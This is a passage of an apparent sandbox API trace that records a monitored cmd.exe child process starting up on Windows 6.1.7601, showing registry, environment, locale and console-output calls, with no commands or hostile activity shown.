	[0140.064] FindNextFileW (in: hFindFile=0x7ba8b08, lpFindFileData=0xae4f094 | out: lpFindFileData=0xae4f094*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11d8d700, ftCreationTime.dwHighDateTime=0x1c07b1f, ftLastAccessTime.dwLowDateTime=0xeec79e70, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x11d8d700, ftLastWriteTime.dwHighDateTime=0x1c07b1f, nFileSizeHigh=0x0, nFileSizeLow=0x4c450, dwReserved0=0x0, dwReserved1=0x0, cFileName="CAGCAT10.MML", cAlternateFileName="")) returned 1

Thread:
	id = 65
	os_tid = 0x790


Thread:
	id = 67
	os_tid = 0x7a0


Thread:
	id = 69
	os_tid = 0x7a8


Process:
	id = "9"
	image_name = "cmd.exe"
	filename = "c:\\windows\\system32\\cmd.exe"
	page_root = "0x70eb6000"
	os_pid = "0x730"
	os_integrity_level = "0x2000"
	os_privileges = "0x800000"
	monitor_reason = "child_process"
	parent_id = "8"
	os_parent_pid = "0x5e0"
	cmd_line = "\"C:\\Windows\\system32\\cmd.exe\""
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ecd5" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 47
	os_tid = 0x734

	[0136.953] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x15f950 | out: lpSystemTimeAsFileTime=0x15f950*(dwLowDateTime=0x332f4c20, dwHighDateTime=0x1d58eee)) 
	[0136.953] GetCurrentProcessId () returned 0x730
	[0136.953] GetCurrentThreadId () returned 0x734
	[0136.953] GetTickCount () returned 0x1133ed5
	[0136.953] QueryPerformanceCounter (in: lpPerformanceCount=0x15f958 | out: lpPerformanceCount=0x15f958*=8221361350) returned 1
	[0136.954] GetModuleHandleW (lpModuleName=0x0) returned 0x4a410000
	[0136.954] __set_app_type (_Type=0x1) 
	[0136.954] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a437810) returned 0x0
	[0136.954] __getmainargs (in: _Argc=0x4a45a608, _Argv=0x4a45a618, _Env=0x4a45a610, _DoWildCard=0, _StartInfo=0x4a43e0f4 | out: _Argc=0x4a45a608, _Argv=0x4a45a618, _Env=0x4a45a610) returned 0
	[0136.955] GetCurrentThreadId () returned 0x734
	[0136.955] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x734) returned 0x3c
	[0136.956] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77190000
	[0136.956] GetProcAddress (hModule=0x77190000, lpProcName="SetThreadUILanguage") returned 0x771a6d40
	[0136.956] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
	[0136.956] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1
	[0136.956] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x15f8e8 | out: phkResult=0x15f8e8*=0x0) returned 0x2
	[0136.956] VirtualQuery (in: lpAddress=0x15f8d0, lpBuffer=0x15f850, dwLength=0x30 | out: lpBuffer=0x15f850*(BaseAddress=0x15f000, AllocationBase=0x60000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0136.956] VirtualQuery (in: lpAddress=0x60000, lpBuffer=0x15f850, dwLength=0x30 | out: lpBuffer=0x15f850*(BaseAddress=0x60000, AllocationBase=0x60000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0136.956] VirtualQuery (in: lpAddress=0x61000, lpBuffer=0x15f850, dwLength=0x30 | out: lpBuffer=0x15f850*(BaseAddress=0x61000, AllocationBase=0x60000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x104, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0136.956] VirtualQuery (in: lpAddress=0x64000, lpBuffer=0x15f850, dwLength=0x30 | out: lpBuffer=0x15f850*(BaseAddress=0x64000, AllocationBase=0x60000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0xfc000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0136.956] VirtualQuery (in: lpAddress=0x160000, lpBuffer=0x15f850, dwLength=0x30 | out: lpBuffer=0x15f850*(BaseAddress=0x160000, AllocationBase=0x160000, AllocationProtect=0x2, __alignment1=0x0, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000, __alignment2=0x0)) returned 0x30
	[0136.956] GetConsoleOutputCP () returned 0x1b5
	[0136.956] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a44bfe0 | out: lpCPInfo=0x4a44bfe0) returned 1
	[0136.957] SetConsoleCtrlHandler (HandlerRoutine=0x4a433184, Add=1) returned 1
	[0136.957] _get_osfhandle (_FileHandle=1) returned 0xf8
	[0136.957] SetConsoleMode (hConsoleHandle=0xf8, dwMode=0x0) returned 0
	[0136.957] _get_osfhandle (_FileHandle=1) returned 0xf8
	[0136.957] GetConsoleMode (in: hConsoleHandle=0xf8, lpMode=0x4a43e194 | out: lpMode=0x4a43e194) returned 0
	[0136.958] _get_osfhandle (_FileHandle=0) returned 0xec
	[0136.958] GetConsoleMode (in: hConsoleHandle=0xec, lpMode=0x4a43e198 | out: lpMode=0x4a43e198) returned 0
	[0136.958] GetEnvironmentStringsW () returned 0x208aa0*
	[0136.958] GetProcessHeap () returned 0x1f0000
	[0136.958] RtlAllocateHeap (HeapHandle=0x1f0000, Flags=0x8, Size=0xab4) returned 0x209560
	[0136.958] FreeEnvironmentStringsW (penv=0x208aa0) returned 1
	[0136.958] GetProcessHeap () returned 0x1f0000
	[0136.958] RtlAllocateHeap (HeapHandle=0x1f0000, Flags=0x8, Size=0x8) returned 0x208920
	[0136.958] GetEnvironmentStringsW () returned 0x208aa0*
	[0136.958] GetProcessHeap () returned 0x1f0000
	[0136.958] RtlAllocateHeap (HeapHandle=0x1f0000, Flags=0x8, Size=0xab4) returned 0x20a020
	[0136.958] FreeEnvironmentStringsW (penv=0x208aa0) returned 1
	[0136.958] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x15e7a8 | out: phkResult=0x15e7a8*=0x44) returned 0x0
	[0136.958] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x15e7a0, lpData=0x15e7c0, lpcbData=0x15e7a4*=0x1000 | out: lpType=0x15e7a0*=0x0, lpData=0x15e7c0*=0x18, lpcbData=0x15e7a4*=0x1000) returned 0x2
	[0136.958] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x15e7a0, lpData=0x15e7c0, lpcbData=0x15e7a4*=0x1000 | out: lpType=0x15e7a0*=0x4, lpData=0x15e7c0*=0x1, lpcbData=0x15e7a4*=0x4) returned 0x0
	[0136.958] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x15e7a0, lpData=0x15e7c0, lpcbData=0x15e7a4*=0x1000 | out: lpType=0x15e7a0*=0x0, lpData=0x15e7c0*=0x1, lpcbData=0x15e7a4*=0x1000) returned 0x2
	[0136.959] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x15e7a0, lpData=0x15e7c0, lpcbData=0x15e7a4*=0x1000 | out: lpType=0x15e7a0*=0x4, lpData=0x15e7c0*=0x0, lpcbData=0x15e7a4*=0x4) returned 0x0
	[0136.959] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x15e7a0, lpData=0x15e7c0, lpcbData=0x15e7a4*=0x1000 | out: lpType=0x15e7a0*=0x4, lpData=0x15e7c0*=0x40, lpcbData=0x15e7a4*=0x4) returned 0x0
	[0136.959] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x15e7a0, lpData=0x15e7c0, lpcbData=0x15e7a4*=0x1000 | out: lpType=0x15e7a0*=0x4, lpData=0x15e7c0*=0x40, lpcbData=0x15e7a4*=0x4) returned 0x0
	[0136.959] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x15e7a0, lpData=0x15e7c0, lpcbData=0x15e7a4*=0x1000 | out: lpType=0x15e7a0*=0x0, lpData=0x15e7c0*=0x40, lpcbData=0x15e7a4*=0x1000) returned 0x2
	[0136.959] RegCloseKey (hKey=0x44) returned 0x0
	[0136.959] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x15e7a8 | out: phkResult=0x15e7a8*=0x44) returned 0x0
	[0136.959] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x15e7a0, lpData=0x15e7c0, lpcbData=0x15e7a4*=0x1000 | out: lpType=0x15e7a0*=0x0, lpData=0x15e7c0*=0x40, lpcbData=0x15e7a4*=0x1000) returned 0x2
	[0136.959] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x15e7a0, lpData=0x15e7c0, lpcbData=0x15e7a4*=0x1000 | out: lpType=0x15e7a0*=0x4, lpData=0x15e7c0*=0x1, lpcbData=0x15e7a4*=0x4) returned 0x0
	[0136.959] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x15e7a0, lpData=0x15e7c0, lpcbData=0x15e7a4*=0x1000 | out: lpType=0x15e7a0*=0x0, lpData=0x15e7c0*=0x1, lpcbData=0x15e7a4*=0x1000) returned 0x2
	[0136.959] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x15e7a0, lpData=0x15e7c0, lpcbData=0x15e7a4*=0x1000 | out: lpType=0x15e7a0*=0x4, lpData=0x15e7c0*=0x0, lpcbData=0x15e7a4*=0x4) returned 0x0
	[0136.959] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x15e7a0, lpData=0x15e7c0, lpcbData=0x15e7a4*=0x1000 | out: lpType=0x15e7a0*=0x4, lpData=0x15e7c0*=0x9, lpcbData=0x15e7a4*=0x4) returned 0x0
	[0136.959] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x15e7a0, lpData=0x15e7c0, lpcbData=0x15e7a4*=0x1000 | out: lpType=0x15e7a0*=0x4, lpData=0x15e7c0*=0x9, lpcbData=0x15e7a4*=0x4) returned 0x0
	[0136.959] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x15e7a0, lpData=0x15e7c0, lpcbData=0x15e7a4*=0x1000 | out: lpType=0x15e7a0*=0x0, lpData=0x15e7c0*=0x9, lpcbData=0x15e7a4*=0x1000) returned 0x2
	[0136.959] RegCloseKey (hKey=0x44) returned 0x0
	[0136.959] time (in: timer=0x0 | out: timer=0x0) returned 0x5db93282
	[0136.959] srand (_Seed=0x5db93282) 
	[0136.959] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\""
	[0136.959] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\""
	[0136.960] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a44c0a0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0136.960] GetProcessHeap () returned 0x1f0000
	[0136.960] RtlAllocateHeap (HeapHandle=0x1f0000, Flags=0x8, Size=0x218) returned 0x20aae0
	[0136.960] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x20aaf0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b
	[0136.961] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a43f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63
	[0136.961] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a43f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0136.961] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a43f360, nSize=0x2000 | out: lpBuffer="") returned 0x0
	[0136.961] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13
	[0136.961] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11
	[0136.961] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13
	[0136.961] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13
	[0136.961] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12
	[0136.961] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4
	[0136.961] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2
	[0136.961] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8
	[0136.961] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1
	[0136.961] GetProcessHeap () returned 0x1f0000
	[0136.961] HeapFree (in: hHeap=0x1f0000, dwFlags=0x0, lpMem=0x209560 | out: hHeap=0x1f0000) returned 1
	[0136.961] GetEnvironmentStringsW () returned 0x208aa0*
	[0136.961] GetProcessHeap () returned 0x1f0000
	[0136.961] RtlAllocateHeap (HeapHandle=0x1f0000, Flags=0x8, Size=0xacc) returned 0x20ad00
	[0136.961] FreeEnvironmentStringsW (penv=0x208aa0) returned 1
	[0136.961] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a43f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b
	[0136.961] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a43f360, nSize=0x2000 | out: lpBuffer="") returned 0x0
	[0136.961] _wcsicmp (_String1="KEYS", _String2="CD") returned 8
	[0136.961] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6
	[0136.961] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8
	[0136.961] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8
	[0136.962] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7
	[0136.962] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9
	[0136.962] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7
	[0136.962] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3
	[0136.962] GetProcessHeap () returned 0x1f0000
	[0136.962] RtlAllocateHeap (HeapHandle=0x1f0000, Flags=0x8, Size=0x38) returned 0x2064d0
	[0136.962] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x15f5b0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0136.962] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x104, lpBuffer=0x15f5b0, lpFilePart=0x15f590 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x15f590*="system32") returned 0x13
	[0136.962] GetFileAttributesW (lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32")) returned 0x10
	[0136.962] FindFirstFileW (in: lpFileName="C:\\Windows", lpFindFileData=0x15f2c0 | out: lpFindFileData=0x15f2c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x59000158, cFileName="Windows", cAlternateFileName="")) returned 0x20b7e0
	[0136.962] FindClose (in: hFindFile=0x20b7e0 | out: hFindFile=0x20b7e0) returned 1
	[0136.962] FindFirstFileW (in: lpFileName="C:\\Windows\\system32", lpFindFileData=0x15f2c0 | out: lpFindFileData=0x15f2c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xf24967e0, ftLastAccessTime.dwHighDateTime=0x1d58eed, ftLastWriteTime.dwLowDateTime=0xf24967e0, ftLastWriteTime.dwHighDateTime=0x1d58eed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x59000158, cFileName="System32", cAlternateFileName="")) returned 0x20b7e0
	[0136.962] FindClose (in: hFindFile=0x20b7e0 | out: hFindFile=0x20b7e0) returned 1
	[0136.962] GetFileAttributesW (lpFileName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 0x10
	[0136.962] SetCurrentDirectoryW (lpPathName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 1
	[0136.962] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Windows\\System32") returned 1
	[0136.962] GetProcessHeap () returned 0x1f0000
	[0136.962] HeapFree (in: hHeap=0x1f0000, dwFlags=0x0, lpMem=0x20ad00 | out: hHeap=0x1f0000) returned 1
	[0136.962] GetEnvironmentStringsW () returned 0x20ad00*
	[0136.963] GetProcessHeap () returned 0x1f0000
	[0136.963] RtlAllocateHeap (HeapHandle=0x1f0000, Flags=0x8, Size=0xafc) returned 0x208aa0
	[0136.963] FreeEnvironmentStringsW (penv=0x20ad00) returned 1
	[0136.963] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a44c0a0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0136.963] GetProcessHeap () returned 0x1f0000
	[0136.963] HeapFree (in: hHeap=0x1f0000, dwFlags=0x0, lpMem=0x2064d0 | out: hHeap=0x1f0000) returned 1
	[0136.963] GetProcessHeap () returned 0x1f0000
	[0136.963] RtlAllocateHeap (HeapHandle=0x1f0000, Flags=0x8, Size=0x4016) returned 0x20ad00
	[0136.963] GetProcessHeap () returned 0x1f0000
	[0136.963] HeapFree (in: hHeap=0x1f0000, dwFlags=0x0, lpMem=0x20ad00 | out: hHeap=0x1f0000) returned 1
	[0136.963] GetConsoleOutputCP () returned 0x1b5
	[0136.963] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a44bfe0 | out: lpCPInfo=0x4a44bfe0) returned 1
	[0136.963] GetUserDefaultLCID () returned 0x409
	[0136.964] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a447b50, cchData=8 | out: lpLCData=":") returned 2
	[0136.964] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x15f6c0, cchData=128 | out: lpLCData="0") returned 2
	[0136.964] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x15f6c0, cchData=128 | out: lpLCData="0") returned 2
	[0136.964] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x15f6c0, cchData=128 | out: lpLCData="1") returned 2
	[0136.964] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a45a740, cchData=8 | out: lpLCData="/") returned 2
	[0136.964] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a45a4a0, cchData=32 | out: lpLCData="Mon") returned 4
	[0136.964] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a45a460, cchData=32 | out: lpLCData="Tue") returned 4
	[0136.964] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a45a420, cchData=32 | out: lpLCData="Wed") returned 4
	[0136.964] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a45a3e0, cchData=32 | out: lpLCData="Thu") returned 4
	[0136.964] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a45a3a0, cchData=32 | out: lpLCData="Fri") returned 4
	[0136.964] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a45a360, cchData=32 | out: lpLCData="Sat") returned 4
	[0136.964] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a45a700, cchData=32 | out: lpLCData="Sun") returned 4
	[0136.964] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a447b40, cchData=8 | out: lpLCData=".") returned 2
	[0136.964] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a45a4e0, cchData=8 | out: lpLCData=",") returned 2
	[0136.964] setlocale (category=0, locale=".OCP") returned="English_United States.437"
	[0136.965] GetProcessHeap () returned 0x1f0000
	[0136.965] RtlAllocateHeap (HeapHandle=0x1f0000, Flags=0x0, Size=0x20c) returned 0x209620
	[0136.965] GetConsoleTitleW (in: lpConsoleTitle=0x209620, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b
	[0136.966] _get_osfhandle (_FileHandle=1) returned 0xf8
	[0136.966] GetFileType (hFile=0xf8) returned 0x3
	[0136.967] BrandingFormatString () returned 0x209840
	[0136.971] GetVersion () returned 0x1db10106
	[0136.971] _vsnwprintf (in: _Buffer=0x15f830, _BufferCount=0x1f, _Format="%d.%d.%04d", _ArgList=0x15f7c8 | out: _Buffer="6.1.7601") returned 8
	[0136.971] _get_osfhandle (_FileHandle=1) returned 0xf8
	[0136.971] GetFileType (hFile=0xf8) returned 0x3
	[0136.971] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2350, dwLanguageId=0x0, lpBuffer=0x4a456340, nSize=0x2000, Arguments=0x0 | out: lpBuffer="Microsoft Windows [Version %1]") returned 0x1e
	[0136.973] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2350, dwLanguageId=0x0, lpBuffer=0x4a456340, nSize=0x2000, Arguments=0x15f7d0 | out: lpBuffer="Microsoft Windows [Version 6.1.7601]") returned 0x24
	[0136.973] _get_osfhandle (_FileHandle=1) returned 0xf8
	[0136.973] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="Microsoft Windows [Version 6.1.7601]", cchWideChar=-1, lpMultiByteStr=0x4a44c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft Windows [Version 6.1.7601]", lpUsedDefaultChar=0x0) returned 37
	[0136.973] WriteFile (in: hFile=0xf8, lpBuffer=0x4a44c320*, nNumberOfBytesToWrite=0x24, lpNumberOfBytesWritten=0x15f758, lpOverlapped=0x0 | out: lpBuffer=0x4a44c320*, lpNumberOfBytesWritten=0x15f758*=0x24, lpOverlapped=0x0) returned 1
	[0136.973] _vsnwprintf (in: _Buffer=0x4a456340, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x15f7f8 | out: _Buffer="\r\n") returned 2
	[0136.974] _get_osfhandle (_FileHandle=1) returned 0xf8
	[0136.974] GetFileType (hFile=0xf8) returned 0x3
	[0136.974] _get_osfhandle (_FileHandle=1) returned 0xf8
	[0136.974] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x4a44c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 3
	[0136.974] WriteFile (in: hFile=0xf8, lpBuffer=0x4a44c320*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x15f7c8, lpOverlapped=0x0 | out: lpBuffer=0x4a44c320*, lpNumberOfBytesWritten=0x15f7c8*=0x2, lpOverlapped=0x0) returned 1
	[0136.974] _vsnwprintf (in: _Buffer=0x4a456340, _BufferCount=0x1fff, _Format="%s", _ArgList=0x15f7f8 | out: _Buffer="Copyright (c) 2009 Microsoft Corporation.  All rights reserved.") returned 63
	[0136.974] _get_osfhandle (_FileHandle=1) returned 0xf8
	[0136.974] GetFileType (hFile=0xf8) returned 0x3
	[0136.974] _get_osfhandle (_FileHandle=1) returned 0xf8
	[0136.974] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="Copyright (c) 2009 Microsoft Corporation.  All rights reserved.", cchWideChar=-1, lpMultiByteStr=0x4a44c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Copyright (c) 2009 Microsoft Corporation.  All rights reserved.", lpUsedDefaultChar=0x0) returned 64
	[0136.974] WriteFile (in: hFile=0xf8, lpBuffer=0x4a44c320*, nNumberOfBytesToWrite=0x3f, lpNumberOfBytesWritten=0x15f7c8, lpOverlapped=0x0 | out: lpBuffer=0x4a44c320*, lpNumberOfBytesWritten=0x15f7c8*=0x3f, lpOverlapped=0x0) returned 1
	[0136.974] _vsnwprintf (in: _Buffer=0x4a456340, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x15f7f8 | out: _Buffer="\r\n") returned 2
	[0136.974] _get_osfhandle (_FileHandle=1) returned 0xf8
	[0136.974] GetFileType (hFile=0xf8) returned 0x3
	[0136.974] _get_osfhandle (_FileHandle=1) returned 0xf8
	[0136.974] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x4a44c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 3
	[0136.974] WriteFile (in: hFile=0xf8, lpBuffer=0x4a44c320*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x15f7c8, lpOverlapped=0x0 | out: lpBuffer=0x4a44c320*, lpNumberOfBytesWritten=0x15f7c8*=0x2, lpOverlapped=0x0) returned 1
	[0136.974] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77190000
	[0136.975] GetProcAddress (hModule=0x77190000, lpProcName="CopyFileExW") returned 0x771a23d0
	[0136.975] GetProcAddress (hModule=0x77190000, lpProcName="IsDebuggerPresent") returned 0x77198290
	[0136.975] GetProcAddress (hModule=0x77190000, lpProcName="SetConsoleInputExeNameW") returned 0x771a17e0
	[0136.975] _get_osfhandle (_FileHandle=0) returned 0xec
	[0136.975] GetFileType (hFile=0xec) returned 0x3
	[0136.975] _setmode (_FileHandle=0, _Mode=32768) returned 16384
	[0136.975] NtOpenThreadToken (in: ThreadHandle=0xfffffffffffffffe, DesiredAccess=0x8, OpenAsSelf=0, TokenHandle=0x15f620 | out: TokenHandle=0x15f620*=0x0) returned 0xc000007c
	[0136.975] NtOpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x8, TokenHandle=0x15f620 | out: TokenHandle=0x15f620*=0x50) returned 0x0
	[0136.975] NtQueryInformationToken (in: TokenHandle=0x50, TokenInformationClass=0x12, TokenInformation=0x15f630, TokenInformationLength=0x4, ReturnLength=0x15f638 | out: TokenInformation=0x15f630, ReturnLength=0x15f638) returned 0x0
	[0136.977] NtQueryInformationToken (in: TokenHandle=0x50, TokenInformationClass=0x1a, TokenInformation=0x15f638, TokenInformationLength=0x4, ReturnLength=0x15f630 | out: TokenInformation=0x15f638, ReturnLength=0x15f630) returned 0x0
	[0136.977] NtClose (Handle=0x50) returned 0x0
	[0136.977] GetProcessHeap () returned 0x1f0000
	[0136.977] HeapFree (in: hHeap=0x1f0000, dwFlags=0x0, lpMem=0x20aae0 | out: hHeap=0x1f0000) returned 1
	[0136.979] _vsnwprintf (in: _Buffer=0x4a456340, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x15f338 | out: _Buffer="\r\n") returned 2
	[0136.979] _get_osfhandle (_FileHandle=1) returned 0xf8
	[0136.979] GetFileType (hFile=0xf8) returned 0x3
	[0136.979] _get_osfhandle (_FileHandle=1) returned 0xf8
	[0136.979] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x4a44c320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 3
	[0136.979] WriteFile (in: hFile=0xf8, lpBuffer=0x4a44c320*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x15f308, lpOverlapped=0x0 | out: lpBuffer=0x4a44c320*, lpNumberOfBytesWritten=0x15f308*=0x2, lpOverlapped=0x0) returned 1
	[0136.979] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a43f360, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4
